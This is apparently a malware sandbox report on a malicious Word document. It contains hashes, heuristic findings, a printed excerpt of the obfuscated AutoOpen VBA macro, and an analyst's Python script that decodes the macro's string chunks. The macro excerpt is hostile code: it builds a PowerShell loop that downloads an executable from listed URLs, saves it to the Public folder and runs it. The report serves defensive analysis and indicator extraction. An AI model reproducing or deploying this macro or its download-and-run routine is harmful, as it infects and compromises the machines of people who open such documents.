Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6e2460dab20fcca2…

MALICIOUS

Office (OLE)

Size: 134.5 KB    Created: 2018-01-07 12:53:00    Authoring application: Microsoft Office Word    First seen: 2018-01-23
MD5: 7bdea527c2e5775e52feb8c52c40d7f2
SHA-1: 3507d756273c876c8376c49ab3d977ddf8ac9e81
SHA-256: 6e2460dab20fcca216798641dfa821e73b5bccf510df487839f542a198740778
Risk score: 242

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro whose AutoOpen entry point calls Application.Run on a procedure named OXDTXiwCQBa, passing it the return value of HCbowIECu(); the Shell() call flagged by OLE_VBA_SHELL lies beyond the truncated preview. HCbowIECu() builds its command from long string literals that are padded with junk at both ends, trimmed with Mid(), and interleaved with filler tokens (oi1, phr, x70, YxN, 3bP) that the assembled PowerShell swaps back to quote, dollar and backslash characters through .Replace()/-creplace with [CHaR] codes; the arithmetic lines between them only assign unused variables, with any error suppressed by On Error Resume Next. Once the filler is removed, the visible fragments form a download-and-execute routine rather than a lure display: a comma-separated list of URLs (one entry is www.sca4christ[.]org/ZLkpa/), a target path assembled from the Public profile directory (env:public), a random name and '.exe', Invoke-Item on that path, and a try/catch with break that moves on to the next URL when one fails. The ClamAV name Img.Dropper.PhishingLure is a generic signature label and should not be read as describing the payload; the extracted strings are the stronger evidence.

Heuristics 7

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample the canned description is stale: the VBA project was recovered (see Extracted artifacts) and its AutoOpen is already covered by OLE_VBA_AUTOOPEN, so this finding adds no independent evidence.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://oi1+oi1wwophr+phri1+oi1woi1+oi1  In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main  In document text (OLE body)
    The first entry is a filler-padded fragment of the macro's own string data, not a reachable host: with the oi1/phr tokens and the '+' concatenations removed it collapses to http://www, so it is not usable as an indicator. The second is the standard DrawingML schema namespace present in ordinary Word documents.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  40312 bytes
SHA-256: 306f7146b3cc309721edda6a16916d8cf3f8c966ee2dbe7c466dcff32b9cd6bc
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "BrQEfdbVTcBNAa"
Sub AutoOpen()
On Error Resume Next
NoSzrulod = 8 + CDbl(JihpRHYB) / (YoPEMPKLLN + ChrB(YwwBfmqCChDH / ChrW(847) * WEsjONbmwoEz - Sgn(342)))
zjFihjZar = 8 + CDbl(NmfJiQWznUjf) / (IXbwzlzaHrEi + ChrB(kUUwiht / ChrW(847) * rFDEjLQwAkQSA - Sgn(342)))
wKGncorHF = 8 + CDbl(bbajCipqzltRRX) / (OajbGGnPCoJOL + ChrB(sChlKcc / ChrW(847) * fNULuRjH - Sgn(342)))
ftivONHfw = 8 + CDbl(nMYrtQioGjMfH) / (OFvWHvMVivIPfQ + ChrB(iuCnWoQknTEhF / ChrW(847) * zuzmnjIR - Sgn(342)))
Application.Run "OXDTXiwCQBa", HCbowIECu
kXCbRicji = 8 + CDbl(OAbpKskGwVIC) / (OHKlAJc + ChrB(jfNJikuWmHDpT / ChrW(847) * FjIkHBjhn - Sgn(342)))
JiUoTGsca = 8 + CDbl(siVOffI) / (jLNENkvCbdQBb + ChrB(CrEbKvaQ / ChrW(847) * fdnaojUcFwLzVZ - Sgn(342)))
EUktRfPMY = 8 + CDbl(hbdKDVMPTSi) / (aJGSGAKCPNj + ChrB(zHaCJkdTF / ChrW(847) * sMGKYkmwd - Sgn(342)))
DqcuamzYP = 8 + CDbl(VKTvLKw) / (JFjoPWMRtLwbaQ + ChrB(kcbXNzPKL / ChrW(847) * RjCYRvzcp - Sgn(342)))
End Sub
Function HCbowIECu()
On Error Resume Next
zBjzHa = ("zsl8QqnBvaYrphr+phr+oi1t xoi1+oi170_.Eoi1+oi1xoi1+oi1ceptphr+phrioi1+oi'+'1on.Moi1+oi1essa'+'ge;oi1+oi1}}oiphr+XpJztajSjOVI")
jUpuKP = 8 + CDbl(YBGNkJXCjKoAP) / (AYiTjEadPNbz + ChrB(YQsQzZsXNvOR / ChrW(847) * jkjLuPmvwwutwq - Sgn(342)))
wAUzUw = Mid(zBjzHa, 13, 99)
WiBPfhjiu = 8 + CDbl(vltmkazmn) / (qaWMmcTBmYqzET + ChrB(NmcTwXzj / ChrW(847) * bbCcjWhwsRD - Sgn(342)))
OmBPiQPL = ("BN0Kdn1+oi1+oi1 oi1+oi1Yophr+phri1+oi1xoi1+oi1N3bPYxophr+phri1+oi1Nphr+phr + oi1+oi1xoi1+oi1phr+phr70karapoi1+oi1aphr+phrs + YxN.exeYoi1+o1UjE")
RjmsnmSAIAz = 8 + CDbl(JiJfCuM) / (TzztkXvbituLCZ + ChrB(FSSsDavHQzoL / ChrW(847) * hMCsDbiDSHnI - Sgn(342)))
BboiSHY = Mid(OmBPiQPL, 8, 131)
PWJQhsXV = 8 + CDbl(pRkzPAjzDNkCJ) / (YritwLNtVq + ChrB(HavhmLf / ChrW(847) * KkdXRjncldwS - Sgn(342)))
AaSHzrT = ("9n5ph'+'r1).ReplAC'+'e(oi1YxNoi1,[StrINg][CHaR]39).Replphr+phrACe((['+'CHaR]51+[CHaphr+phrR]98phsOP0pOalNb7s")
hIBZLhiHjFB = 8 + CDbl(bNoVMwNYvT) / (rSDiNDjY + ChrB(luEwtOERiU / ChrW(847) * MqziuuGDaKmSCd - Sgn(342)))
JFobAA = Mid(AaSHzrT, 4, 93)
FfSNSp = 8 + CDbl(kuFZaHIIihJ) / (bzrvtbWwAUUnT + ChrB(dwKwbCVOiKMFtp / ChrW(847) * iPBlFiF - Sgn(342)))
SiUzCEdrOtR = ("P2tiqAkFwtrYcRZ61kozio'+'lku.pl'+'/omgr/,hoi1+oi1t'+'tpoi1+oi1'+'://oi1+oi1www.sca4ch'+'rist.org/ZLkpa/,httoi'+'1+oi1poi1+oi1:'+'phr+phroi'+'1+oi1//woi1+ophr+phri1ww.thoi1+oi1foi1+oi1poi1+ocE")
VJsDTsnksmV = 8 + CDbl(dkRmCfFJwkMKIO) / (LFvCiVldcEzpo + ChrB(UAhZVYdBl / ChrW(847) * QAaXGXEb - Sgn(342)))
XzhERahfjH = Mid(SiUzCEdrOtR, 17, 173)
fLNbmo = 8 + CDbl(HEGwhBasHoi) / (qQrijik + ChrB(pOJTimduNXEz / ChrW(847) * JjNOCAXujW - Sgn(342)))
BnadE = ("lCTihSzcX43245);x7oi1+oi10hoi1+oi1uoi1+oi1aoi1+oi1s =oi1+oi1 x70oi1+oi1env:publico'+'phr+phriphr+phr1+'+'oi1 PcJtOwSAFKdBETfOs")
GlMLmRiNW = 8 + CDbl(bmEAOBmcV) / (szFdoPGzjBw + ChrB(pidULiYDzO / ChrW(847) * LovZMcIFVuzTvG - Sgn(342)))
Zqkpdz = Mid(BnadE, 10, 100)
QbrYknJo = 8 + CDbl(MwYkmmWEzWXup) / (DSaiCtp + ChrB(puUYvbcpPhNVWc / ChrW(847) * PbKokwDpiSB - Sgn(342)))
NXbdfmo = ("KJ43kdBr+phr+[CHaR]80),[StrINg][CHaR]92).ReplACe(('+'[CHaR]1phr+phr20+[CHaR]55+[CHaR]48),oi1gWGo'+'i1) ) phr)-creplace  phroi1phr,[chAr]39-Replacephrln5BkOz7")
diYsVYj = 8 + CDbl(qwABwUro) / (mBHuWUZd + ChrB(wmbpjBjz / ChrW(847) * FnMpYLwEpEl - Sgn(342)))
XHsGwJIJH = Mid(NXbdfmo, 8, 142)
lapjBf = 8 + CDbl(ZRLEnnsb) / (BaVFXHhAPzVB + ChrB(lBAwdwzSiVsBW / ChrW(847) * PlsOnWuENq - Sgn(342)))
WTbHbOk = ("1aPzq7jC4as);Ioi1+oiphr+phr1nvoke-Item(oi1+oi1x70hoi1+oi1uas);breakoi1+'+'oi1;oi1+oi1}catchoi1phr+phr+oi1{write-hosoi1ds4BtL")
sjuHhYcTw = 8 + CDbl(fjINjzQwoDUhb) / (wWtihDuBTpAH + ChrB(wNiVjrlR / ChrW(847) * fzjcbma - Sgn(342)))
UrjkpcTi = Mid(WTbHbOk, 10, 109)
jmiBHam = 8 + CDbl(vvUFpin) / (WnwiNTMZoS + ChrB(GinppSwqwwEb / ChrW(847) * bStFmGJi - Sgn(34
... (truncated)
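Analyst note (added example; this script is not part of the sandbox output or of the macro itself): the Python below reproduces the slicing and filler-stripping on the seven string chunks visible in HCbowIECu(). It emulates VBA Mid(), removes the "'+'" concatenation junk and the oi1/phr filler tokens (each stands for a single quote; the macro's own -creplace 'oi1',[chAr]39 in the NXbdfmo chunk gives the mapping), and then renders the inner placeholders that the assembled PowerShell rewrites with .Replace(): YxN to ' and 3bP to \ are spelled out in the chunks as [CHaR]39 and [CHaR]92, while x70 to $ is an assumption inferred from x70env:public, because the preview only shows x70 being rewritten to 'gWG' and the final character is outside it. The order in which the chunks are joined is in the truncated part of the macro, so the fragments are decoded one by one rather than concatenated; the variable names are the macro's own and the literals are copied from the preview above.

```python
"""Analyst helper for the Mid()-sliced, filler-padded strings in HCbowIECu().

Added example; not part of the sandbox output or the macro. Each chunk is a
long literal with junk bytes at both ends that the macro trims with
Mid(chunk, start, length); the pieces are joined later, in the truncated part
of the listing, so they are decoded here individually.
"""
import re

# (variable, Mid start, Mid length, literal) copied from the extracted macro.
CHUNKS = [
    ("zBjzHa", 13, 99, "zsl8QqnBvaYrphr+phr+oi1t xoi1+oi170_.Eoi1+oi1xoi1+oi1ceptphr+phrioi1+oi'+'1on.Moi1+oi1essa'+'ge;oi1+oi1}}oiphr+XpJztajSjOVI"),
    ("OmBPiQPL", 8, 131, "BN0Kdn1+oi1+oi1 oi1+oi1Yophr+phri1+oi1xoi1+oi1N3bPYxophr+phri1+oi1Nphr+phr + oi1+oi1xoi1+oi1phr+phr70karapoi1+oi1aphr+phrs + YxN.exeYoi1+o1UjE"),
    ("AaSHzrT", 4, 93, "9n5ph'+'r1).ReplAC'+'e(oi1YxNoi1,[StrINg][CHaR]39).Replphr+phrACe((['+'CHaR]51+[CHaphr+phrR]98phsOP0pOalNb7s"),
    ("SiUzCEdrOtR", 17, 173, "P2tiqAkFwtrYcRZ61kozio'+'lku.pl'+'/omgr/,hoi1+oi1t'+'tpoi1+oi1'+'://oi1+oi1www.sca4ch'+'rist.org/ZLkpa/,httoi'+'1+oi1poi1+oi1:'+'phr+phroi'+'1+oi1//woi1+ophr+phri1ww.thoi1+oi1foi1+oi1poi1+ocE"),
    ("BnadE", 10, 100, "lCTihSzcX43245);x7oi1+oi10hoi1+oi1uoi1+oi1aoi1+oi1s =oi1+oi1 x70oi1+oi1env:publico'+'phr+phriphr+phr1+'+'oi1 PcJtOwSAFKdBETfOs"),
    ("NXbdfmo", 8, 142, "KJ43kdBr+phr+[CHaR]80),[StrINg][CHaR]92).ReplACe(('+'[CHaR]1phr+phr20+[CHaR]55+[CHaR]48),oi1gWGo'+'i1) ) phr)-creplace  phroi1phr,[chAr]39-Replacephrln5BkOz7"),
    ("WTbHbOk", 10, 109, "1aPzq7jC4as);Ioi1+oiphr+phr1nvoke-Item(oi1+oi1x70hoi1+oi1uas);breakoi1+'+'oi1;oi1+oi1}catchoi1phr+phr+oi1{write-hosoi1ds4BtL"),
]

# Filler tokens that each stand for a single quote. The macro's own
# "-creplace 'oi1',[chAr]39" (chunk NXbdfmo) gives the mapping for oi1; phr is
# treated the same way because phr+phr and oi1+oi1 both reduce to the
# PowerShell concatenation '+' once substituted.
QUOTE_TOKENS = ("oi1", "phr")

# Placeholders the assembled PowerShell rewrites with .Replace().
# YxN -> ' and 3bP -> \ are spelled out in the chunks ([CHaR]39, [CHaR]92).
# x70 -> $ is an ASSUMPTION inferred from "x70env:public"; the preview only
# shows x70 being rewritten to 'gWG', the final character is not visible.
INNER_PLACEHOLDERS = {"YxN": "'", "3bP": "\\", "x70": "$"}


def vba_mid(text, start, length):
    """VBA Mid(): 1-based start, at most `length` characters."""
    return text[start - 1 : start - 1 + length]


def strip_junk(text):
    """Collapse "'+'" concatenations and turn the filler tokens into quotes.

    Iterates because a token can itself be split by a concatenation
    ("oi'+'1") and substituting a token can create a new "'+'" to collapse.
    """
    previous = None
    while text != previous:
        previous = text
        text = text.replace("'+'", "")
        for token in QUOTE_TOKENS:
            text = text.replace(token, "'")
    return text


def render_inner(text):
    """Apply the inner-layer placeholder substitutions for readability."""
    for token, value in INNER_PLACEHOLDERS.items():
        text = text.replace(token, value)
    return text


def decode_fragments(chunks=CHUNKS, render=True):
    """Return {variable: decoded text} for every chunk, in listing order."""
    decoded = {}
    for name, start, length, literal in chunks:
        text = strip_junk(vba_mid(literal, start, length))
        decoded[name] = render_inner(text) if render else text
    return decoded


# A comma separates list entries in the script, so it ends a URL here.
URL_RE = re.compile(r"""https?://[^\s,'"]+""")


def extract_urls(fragments):
    """Fully formed URLs (scheme included) found in the decoded fragments."""
    urls = []
    for text in fragments.values():
        urls.extend(URL_RE.findall(text))
    return urls


if __name__ == "__main__":
    decoded = decode_fragments()
    for name, text in decoded.items():
        print(f"{name:12s} {text}")
    print("URLs:", extract_urls(decoded))
```

Running the script prints the fragments at the rendered level: BnadE yields "$huas = $env:public", OmBPiQPL the continuation "+ '\' + $karapas + '.exe", WTbHbOk "Invoke-Item($huas);break;}catch{write-hos" and zBjzHa "$_.Exception.Message;}}", which together are the per-URL try/download/execute/break loop summarised under Malware Insights. extract_urls() returns only entries that carry their scheme, so the first list entry in SiUzCEdrOtR (…lku.pl/omgr/, cut at a chunk boundary) is not returned and has to be read off the fragment by hand. Because the junk stripping is applied to the whole text rather than layer by layer, it also rewrites the literal 'oi1' and 'YxN' arguments of the script's own replace calls (AaSHzrT, NXbdfmo); that is harmless for indicator extraction but means the output is a readable approximation, not the exact script the Shell() call runs.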